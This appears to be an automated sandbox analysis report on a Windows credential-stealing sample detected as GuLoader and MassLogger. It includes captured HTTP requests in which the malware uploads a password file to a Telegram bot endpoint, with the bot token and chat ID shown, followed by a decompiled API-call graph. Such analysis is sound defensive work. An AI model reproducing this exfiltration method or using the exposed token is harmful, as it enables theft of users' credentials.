                                                                                                          2025-01-10 20:26:13 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 36 37 62 37 33 61 64 65 34 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd3367b73ade45Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-10 20:26:13 UTC347INHTTP/1.1 401 Unauthorized
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Fri, 10 Jan 2025 20:26:13 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 58
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-10 20:26:13 UTC58INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 31 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 55 6e 61 75 74 68 6f 72 69 7a 65 64 22 7d
                                                                                                          Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          16192.168.2.850006149.154.167.2204435624C:\Users\user\Desktop\4UQ5wnI389.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 20:26:16 UTC296OUTPOST /bot7782841068:AAEc-nCmeaG2WG8noQ4QtMz2nBxG0zDBxvA/sendDocument?chat_id=1934716051&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd338994765545
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          Connection: Keep-Alive
                                                                                                          2025-01-10 20:26:16 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 38 39 39 34 37 36 35 35 34 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd338994765545Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-10 20:26:16 UTC347INHTTP/1.1 401 Unauthorized
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Fri, 10 Jan 2025 20:26:16 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 58
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-10 20:26:16 UTC58INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 31 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 55 6e 61 75 74 68 6f 72 69 7a 65 64 22 7d
                                                                                                          Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          17192.168.2.850008149.154.167.2204435624C:\Users\user\Desktop\4UQ5wnI389.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 20:26:17 UTC296OUTPOST /bot7782841068:AAEc-nCmeaG2WG8noQ4QtMz2nBxG0zDBxvA/sendDocument?chat_id=1934716051&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd33a0f2189f40
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          Connection: Keep-Alive
                                                                                                          2025-01-10 20:26:17 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 61 30 66 32 31 38 39 66 34 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd33a0f2189f40Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-10 20:26:17 UTC347INHTTP/1.1 401 Unauthorized
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Fri, 10 Jan 2025 20:26:17 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 58
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-10 20:26:17 UTC58INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 31 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 55 6e 61 75 74 68 6f 72 69 7a 65 64 22 7d
                                                                                                          Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}


                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                          18192.168.2.850011149.154.167.220443
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 20:26:25 UTC296OUTPOST /bot7782841068:AAEc-nCmeaG2WG8noQ4QtMz2nBxG0zDBxvA/sendDocument?chat_id=1934716051&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd318b247ec2cc
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          Connection: Keep-Alive
                                                                                                          2025-01-10 20:26:25 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 38 62 32 34 37 65 63 32 63 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd318b247ec2ccContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-10 20:26:26 UTC347INHTTP/1.1 401 Unauthorized
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Fri, 10 Jan 2025 20:26:26 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 58
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-10 20:26:26 UTC58INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 31 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 55 6e 61 75 74 68 6f 72 69 7a 65 64 22 7d
                                                                                                          Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}


                                                                                                          Click to jump to process

                                                                                                          Click to jump to process

                                                                                                          Click to dive into process behavior distribution

                                                                                                          Click to jump to process

                                                                                                          Target ID:0
                                                                                                          Start time:15:24:16
                                                                                                          Start date:10/01/2025
                                                                                                          Path:C:\Users\user\Desktop\4UQ5wnI389.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Users\user\Desktop\4UQ5wnI389.exe"
                                                                                                          Imagebase:0x400000
                                                                                                          File size:1'007'544 bytes
                                                                                                          MD5 hash:F28C3285968229B7E0C723633FB5C161
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.1940482380.0000000004709000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          Reputation:low
                                                                                                          Has exited:true

                                                                                                          Target ID:5
                                                                                                          Start time:15:25:02
                                                                                                          Start date:10/01/2025
                                                                                                          Path:C:\Users\user\Desktop\4UQ5wnI389.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Users\user\Desktop\4UQ5wnI389.exe"
                                                                                                          Imagebase:0x400000
                                                                                                          File size:1'007'544 bytes
                                                                                                          MD5 hash:F28C3285968229B7E0C723633FB5C161
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000005.00000002.2743712849.0000000034E0B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2743712849.0000000034E0B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000002.2743712849.0000000034E0B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          Reputation:low
                                                                                                          Has exited:false

                                                                                                          Reset < >

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:19.9%
                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                            Signature Coverage:19.5%
                                                                                                            Total number of Nodes:1599
                                                                                                            Total number of Limit Nodes:39
                                                                                                            execution_graph 4163 401941 4164 401943 4163->4164 4169 402c41 4164->4169 4170 402c4d 4169->4170 4215 40640a 4170->4215 4173 401948 4175 405afa 4173->4175 4257 405dc5 4175->4257 4178 405b22 DeleteFileW 4180 401951 4178->4180 4179 405b39 4181 405c64 4179->4181 4271 4063e8 lstrcpynW 4179->4271 4181->4180 4300 40672b FindFirstFileW 4181->4300 4183 405b5f 4184 405b72 4183->4184 4185 405b65 lstrcatW 4183->4185 4272 405d09 lstrlenW 4184->4272 4186 405b78 4185->4186 4190 405b88 lstrcatW 4186->4190 4191 405b7e 4186->4191 4193 405b93 lstrlenW FindFirstFileW 4190->4193 4191->4190 4191->4193 4192 405c82 4303 405cbd lstrlenW CharPrevW 4192->4303 4194 405c59 4193->4194 4204 405bb5 4193->4204 4194->4181 4197 405c3c FindNextFileW 4201 405c52 FindClose 4197->4201 4197->4204 4198 405ab2 5 API calls 4200 405c94 4198->4200 4202 405c98 4200->4202 4203 405cae 4200->4203 4201->4194 4202->4180 4207 405450 24 API calls 4202->4207 4206 405450 24 API calls 4203->4206 4204->4197 4208 405afa 60 API calls 4204->4208 4210 405450 24 API calls 4204->4210 4276 4063e8 lstrcpynW 4204->4276 4277 405ab2 4204->4277 4285 405450 4204->4285 4296 4061ae MoveFileExW 4204->4296 4206->4180 4209 405ca5 4207->4209 4208->4204 4211 4061ae 36 API calls 4209->4211 4210->4197 4213 405cac 4211->4213 4213->4180 4216 406417 4215->4216 4217 406662 4216->4217 4220 406630 lstrlenW 4216->4220 4221 40640a 10 API calls 4216->4221 4224 406545 GetSystemDirectoryW 4216->4224 4226 406558 GetWindowsDirectoryW 4216->4226 4227 40667c 5 API calls 4216->4227 4228 40640a 10 API calls 4216->4228 4229 4065d3 lstrcatW 4216->4229 4230 40658c SHGetSpecialFolderLocation 4216->4230 4241 4062b6 4216->4241 4246 40632f wsprintfW 4216->4246 4247 4063e8 lstrcpynW 4216->4247 4218 402c6e 4217->4218 4248 4063e8 lstrcpynW 4217->4248 4218->4173 4232 40667c 4218->4232 4220->4216 4221->4220 4224->4216 4226->4216 4227->4216 4228->4216 4229->4216 4230->4216 4231 4065a4 SHGetPathFromIDListW CoTaskMemFree 4230->4231 4231->4216 4233 406689 4232->4233 4235 4066f2 CharNextW 4233->4235 4237 4066ff 4233->4237 4239 4066de CharNextW 4233->4239 4240 4066ed CharNextW 4233->4240 4253 405cea 4233->4253 4234 406704 CharPrevW 4234->4237 4235->4233 4235->4237 4237->4234 4238 406725 4237->4238 4238->4173 4239->4233 4240->4235 4249 406255 4241->4249 4244 40631a 4244->4216 4245 4062ea RegQueryValueExW RegCloseKey 4245->4244 4246->4216 4247->4216 4248->4218 4250 406264 4249->4250 4251 406268 4250->4251 4252 40626d RegOpenKeyExW 4250->4252 4251->4244 4251->4245 4252->4251 4254 405cf0 4253->4254 4255 405d06 4254->4255 4256 405cf7 CharNextW 4254->4256 4255->4233 4256->4254 4306 4063e8 lstrcpynW 4257->4306 4259 405dd6 4307 405d68 CharNextW CharNextW 4259->4307 4262 405b1a 4262->4178 4262->4179 4263 40667c 5 API calls 4268 405dec 4263->4268 4264 405e1d lstrlenW 4265 405e28 4264->4265 4264->4268 4267 405cbd 3 API calls 4265->4267 4266 40672b 2 API calls 4266->4268 4269 405e2d GetFileAttributesW 4267->4269 4268->4262 4268->4264 4268->4266 4270 405d09 2 API calls 4268->4270 4269->4262 4270->4264 4271->4183 4273 405d17 4272->4273 4274 405d29 4273->4274 4275 405d1d CharPrevW 4273->4275 4274->4186 4275->4273 4275->4274 4276->4204 4313 405eb9 GetFileAttributesW 4277->4313 4280 405ad5 DeleteFileW 4282 405adb 4280->4282 4281 405acd RemoveDirectoryW 4281->4282 4283 405adf 4282->4283 4284 405aeb SetFileAttributesW 4282->4284 4283->4204 4284->4283 4286 40546b 4285->4286 4295 40550d 4285->4295 4287 405487 lstrlenW 4286->4287 4288 40640a 17 API calls 4286->4288 4289 4054b0 4287->4289 4290 405495 lstrlenW 4287->4290 4288->4287 4292 4054c3 4289->4292 4293 4054b6 SetWindowTextW 4289->4293 4291 4054a7 lstrcatW 4290->4291 4290->4295 4291->4289 4294 4054c9 SendMessageW SendMessageW SendMessageW 4292->4294 4292->4295 4293->4292 4294->4295 4295->4204 4297 4061cf 4296->4297 4298 4061c2 4296->4298 4297->4204 4316 406034 4298->4316 4301 406741 FindClose 4300->4301 4302 405c7e 4300->4302 4301->4302 4302->4180 4302->4192 4304 405c88 4303->4304 4305 405cd9 lstrcatW 4303->4305 4304->4198 4305->4304 4306->4259 4308 405d85 4307->4308 4311 405d97 4307->4311 4309 405d92 CharNextW 4308->4309 4308->4311 4312 405dbb 4309->4312 4310 405cea CharNextW 4310->4311 4311->4310 4311->4312 4312->4262 4312->4263 4314 405abe 4313->4314 4315 405ecb SetFileAttributesW 4313->4315 4314->4280 4314->4281 4314->4283 4315->4314 4317 406064 4316->4317 4318 40608a GetShortPathNameW 4316->4318 4343 405ede GetFileAttributesW CreateFileW 4317->4343 4320 4061a9 4318->4320 4321 40609f 4318->4321 4320->4297 4321->4320 4323 4060a7 wsprintfA 4321->4323 4322 40606e CloseHandle GetShortPathNameW 4322->4320 4324 406082 4322->4324 4325 40640a 17 API calls 4323->4325 4324->4318 4324->4320 4326 4060cf 4325->4326 4344 405ede GetFileAttributesW CreateFileW 4326->4344 4328 4060dc 4328->4320 4329 4060eb GetFileSize GlobalAlloc 4328->4329 4330 4061a2 CloseHandle 4329->4330 4331 40610d 4329->4331 4330->4320 4345 405f61 ReadFile 4331->4345 4336 406140 4338 405e43 4 API calls 4336->4338 4337 40612c lstrcpyA 4339 40614e 4337->4339 4338->4339 4340 406185 SetFilePointer 4339->4340 4352 405f90 WriteFile 4340->4352 4343->4322 4344->4328 4346 405f7f 4345->4346 4346->4330 4347 405e43 lstrlenA 4346->4347 4348 405e84 lstrlenA 4347->4348 4349 405e8c 4348->4349 4350 405e5d lstrcmpiA 4348->4350 4349->4336 4349->4337 4350->4349 4351 405e7b CharNextA 4350->4351 4351->4348 4353 405fae GlobalFree 4352->4353 4353->4330 4354 4015c1 4355 402c41 17 API calls 4354->4355 4356 4015c8 4355->4356 4357 405d68 4 API calls 4356->4357 4369 4015d1 4357->4369 4358 401631 4360 401663 4358->4360 4361 401636 4358->4361 4359 405cea CharNextW 4359->4369 4363 401423 24 API calls 4360->4363 4381 401423 4361->4381 4370 40165b 4363->4370 4368 40164a SetCurrentDirectoryW 4368->4370 4369->4358 4369->4359 4371 401617 GetFileAttributesW 4369->4371 4373 4059b9 4369->4373 4376 40591f CreateDirectoryW 4369->4376 4385 40599c CreateDirectoryW 4369->4385 4371->4369 4388 4067c2 GetModuleHandleA 4373->4388 4377 405970 GetLastError 4376->4377 4378 40596c 4376->4378 4377->4378 4379 40597f SetFileSecurityW 4377->4379 4378->4369 4379->4378 4380 405995 GetLastError 4379->4380 4380->4378 4382 405450 24 API calls 4381->4382 4383 401431 4382->4383 4384 4063e8 lstrcpynW 4383->4384 4384->4368 4386 4059b0 GetLastError 4385->4386 4387 4059ac 4385->4387 4386->4387 4387->4369 4389 4067e8 GetProcAddress 4388->4389 4390 4067de 4388->4390 4392 4059c0 4389->4392 4394 406752 GetSystemDirectoryW 4390->4394 4392->4369 4393 4067e4 4393->4389 4393->4392 4395 406774 wsprintfW LoadLibraryExW 4394->4395 4395->4393 4397 4053c4 4398 4053d4 4397->4398 4399 4053e8 4397->4399 4400 405431 4398->4400 4401 4053da 4398->4401 4402 4053f0 IsWindowVisible 4399->4402 4409 405410 4399->4409 4403 405436 CallWindowProcW 4400->4403 4411 4043ab 4401->4411 4402->4400 4405 4053fd 4402->4405 4406 4053e4 4403->4406 4414 404d1a SendMessageW 4405->4414 4409->4403 4419 404d9a 4409->4419 4412 4043c3 4411->4412 4413 4043b4 SendMessageW 4411->4413 4412->4406 4413->4412 4415 404d79 SendMessageW 4414->4415 4416 404d3d GetMessagePos ScreenToClient SendMessageW 4414->4416 4417 404d71 4415->4417 4416->4417 4418 404d76 4416->4418 4417->4409 4418->4415 4428 4063e8 lstrcpynW 4419->4428 4421 404dad 4429 40632f wsprintfW 4421->4429 4423 404db7 4430 40140b 4423->4430 4427 404dc7 4427->4400 4428->4421 4429->4423 4434 401389 4430->4434 4433 4063e8 lstrcpynW 4433->4427 4435 401390 4434->4435 4436 4013fe 4435->4436 4437 4013cb MulDiv SendMessageW 4435->4437 4436->4433 4437->4435 4882 70142993 4883 701429e3 4882->4883 4884 701429a3 VirtualProtect 4882->4884 4884->4883 4885 401e49 4886 402c1f 17 API calls 4885->4886 4887 401e4f 4886->4887 4888 402c1f 17 API calls 4887->4888 4889 401e5b 4888->4889 4890 401e72 EnableWindow 4889->4890 4891 401e67 ShowWindow 4889->4891 4892 402ac5 4890->4892 4891->4892 4893 40264a 4894 402c1f 17 API calls 4893->4894 4895 402659 4894->4895 4896 4026a3 ReadFile 4895->4896 4897 405f61 ReadFile 4895->4897 4898 4026e3 MultiByteToWideChar 4895->4898 4899 402798 4895->4899 4902 40273c 4895->4902 4903 402709 SetFilePointer MultiByteToWideChar 4895->4903 4904 4027a9 4895->4904 4906 402796 4895->4906 4896->4895 4896->4906 4897->4895 4898->4895 4916 40632f wsprintfW 4899->4916 4902->4895 4902->4906 4907 405fbf SetFilePointer 4902->4907 4903->4895 4905 4027ca SetFilePointer 4904->4905 4904->4906 4905->4906 4908 405fdb 4907->4908 4915 405ff3 4907->4915 4909 405f61 ReadFile 4908->4909 4910 405fe7 4909->4910 4911 406024 SetFilePointer 4910->4911 4912 405ffc SetFilePointer 4910->4912 4910->4915 4911->4915 4912->4911 4913 406007 4912->4913 4914 405f90 WriteFile 4913->4914 4914->4915 4915->4902 4916->4906 4917 404dcc GetDlgItem GetDlgItem 4918 404e1e 7 API calls 4917->4918 4925 405037 4917->4925 4919 404ec1 DeleteObject 4918->4919 4920 404eb4 SendMessageW 4918->4920 4921 404eca 4919->4921 4920->4919 4922 404f01 4921->4922 4924 404ed9 4921->4924 4927 40435f 18 API calls 4922->4927 4923 40511b 4928 4051c7 4923->4928 4935 4053af 4923->4935 4939 405174 SendMessageW 4923->4939 4929 40640a 17 API calls 4924->4929 4925->4923 4926 4050fc 4925->4926 4933 405097 4925->4933 4926->4923 4936 40510d SendMessageW 4926->4936 4934 404f15 4927->4934 4930 4051d1 SendMessageW 4928->4930 4931 4051d9 4928->4931 4932 404ee3 SendMessageW SendMessageW 4929->4932 4930->4931 4942 4051f2 4931->4942 4943 4051eb ImageList_Destroy 4931->4943 4950 405202 4931->4950 4932->4921 4937 404d1a 5 API calls 4933->4937 4938 40435f 18 API calls 4934->4938 4940 4043c6 8 API calls 4935->4940 4936->4923 4954 4050a8 4937->4954 4955 404f23 4938->4955 4939->4935 4945 405189 SendMessageW 4939->4945 4941 4053bd 4940->4941 4946 4051fb GlobalFree 4942->4946 4942->4950 4943->4942 4944 405371 4944->4935 4951 405383 ShowWindow GetDlgItem ShowWindow 4944->4951 4948 40519c 4945->4948 4946->4950 4947 404ff8 GetWindowLongW SetWindowLongW 4949 405011 4947->4949 4959 4051ad SendMessageW 4948->4959 4952 405017 ShowWindow 4949->4952 4953 40502f 4949->4953 4950->4944 4964 404d9a 4 API calls 4950->4964 4968 40523d 4950->4968 4951->4935 4973 404394 SendMessageW 4952->4973 4974 404394 SendMessageW 4953->4974 4954->4926 4955->4947 4958 404f73 SendMessageW 4955->4958 4960 404ff2 4955->4960 4962 404fc0 SendMessageW 4955->4962 4963 404faf SendMessageW 4955->4963 4958->4955 4959->4928 4960->4947 4960->4949 4961 40502a 4961->4935 4962->4955 4963->4955 4964->4968 4965 405347 InvalidateRect 4965->4944 4966 40535d 4965->4966 4975 404cd5 4966->4975 4967 40526b SendMessageW 4969 405281 4967->4969 4968->4967 4968->4969 4969->4965 4970 4052e2 4969->4970 4972 4052f5 SendMessageW SendMessageW 4969->4972 4970->4972 4972->4969 4973->4961 4974->4925 4978 404c0c 4975->4978 4977 404cea 4977->4944 4979 404c25 4978->4979 4980 40640a 17 API calls 4979->4980 4981 404c89 4980->4981 4982 40640a 17 API calls 4981->4982 4983 404c94 4982->4983 4984 40640a 17 API calls 4983->4984 4985 404caa lstrlenW wsprintfW SetDlgItemTextW 4984->4985 4985->4977 5314 4016cc 5315 402c41 17 API calls 5314->5315 5316 4016d2 GetFullPathNameW 5315->5316 5317 4016ec 5316->5317 5318 40170e 5316->5318 5317->5318 5321 40672b 2 API calls 5317->5321 5319 401723 GetShortPathNameW 5318->5319 5320 402ac5 5318->5320 5319->5320 5322 4016fe 5321->5322 5322->5318 5324 4063e8 lstrcpynW 5322->5324 5324->5318 5325 40234e 5326 402c41 17 API calls 5325->5326 5327 40235d 5326->5327 5328 402c41 17 API calls 5327->5328 5329 402366 5328->5329 5330 402c41 17 API calls 5329->5330 5331 402370 GetPrivateProfileStringW 5330->5331 5332 4044cf lstrlenW 5333 4044f0 WideCharToMultiByte 5332->5333 5334 4044ee 5332->5334 5334->5333 5335 404850 5336 40487c 5335->5336 5337 40488d 5335->5337 5396 405a32 GetDlgItemTextW 5336->5396 5339 404899 GetDlgItem 5337->5339 5371 4048f8 5337->5371 5344 4048ad 5339->5344 5340 404887 5341 40667c 5 API calls 5340->5341 5341->5337 5342 4049dc 5345 404b8b 5342->5345 5398 405a32 GetDlgItemTextW 5342->5398 5343 4048c1 SetWindowTextW 5347 40435f 18 API calls 5343->5347 5344->5343 5351 405d68 4 API calls 5344->5351 5350 4043c6 8 API calls 5345->5350 5352 4048dd 5347->5352 5348 40640a 17 API calls 5353 40496c SHBrowseForFolderW 5348->5353 5349 404a0c 5354 405dc5 18 API calls 5349->5354 5355 404b9f 5350->5355 5356 4048b7 5351->5356 5357 40435f 18 API calls 5352->5357 5353->5342 5358 404984 CoTaskMemFree 5353->5358 5359 404a12 5354->5359 5356->5343 5362 405cbd 3 API calls 5356->5362 5360 4048eb 5357->5360 5361 405cbd 3 API calls 5358->5361 5399 4063e8 lstrcpynW 5359->5399 5397 404394 SendMessageW 5360->5397 5364 404991 5361->5364 5362->5343 5367 4049c8 SetDlgItemTextW 5364->5367 5372 40640a 17 API calls 5364->5372 5366 4048f1 5369 4067c2 5 API calls 5366->5369 5367->5342 5368 404a29 5370 4067c2 5 API calls 5368->5370 5369->5371 5379 404a30 5370->5379 5371->5342 5371->5345 5371->5348 5373 4049b0 lstrcmpiW 5372->5373 5373->5367 5376 4049c1 lstrcatW 5373->5376 5374 404a71 5400 4063e8 lstrcpynW 5374->5400 5376->5367 5377 404a78 5378 405d68 4 API calls 5377->5378 5380 404a7e GetDiskFreeSpaceW 5378->5380 5379->5374 5382 405d09 2 API calls 5379->5382 5384 404ac9 5379->5384 5383 404aa2 MulDiv 5380->5383 5380->5384 5382->5379 5383->5384 5385 404b3a 5384->5385 5386 404cd5 20 API calls 5384->5386 5387 404b5d 5385->5387 5389 40140b 2 API calls 5385->5389 5388 404b27 5386->5388 5401 404381 EnableWindow 5387->5401 5391 404b3c SetDlgItemTextW 5388->5391 5392 404b2c 5388->5392 5389->5387 5391->5385 5394 404c0c 20 API calls 5392->5394 5393 404b79 5393->5345 5402 4047a9 5393->5402 5394->5385 5396->5340 5397->5366 5398->5349 5399->5368 5400->5377 5401->5393 5403 4047b7 5402->5403 5404 4047bc SendMessageW 5402->5404 5403->5404 5404->5345 5405 401b53 5406 402c41 17 API calls 5405->5406 5407 401b5a 5406->5407 5408 402c1f 17 API calls 5407->5408 5409 401b63 wsprintfW 5408->5409 5410 402ac5 5409->5410 5411 70141000 5414 7014101b 5411->5414 5421 70141516 5414->5421 5416 70141020 5417 70141027 GlobalAlloc 5416->5417 5418 70141024 5416->5418 5417->5418 5419 7014153d 3 API calls 5418->5419 5420 70141019 5419->5420 5423 7014151c 5421->5423 5422 70141522 5422->5416 5423->5422 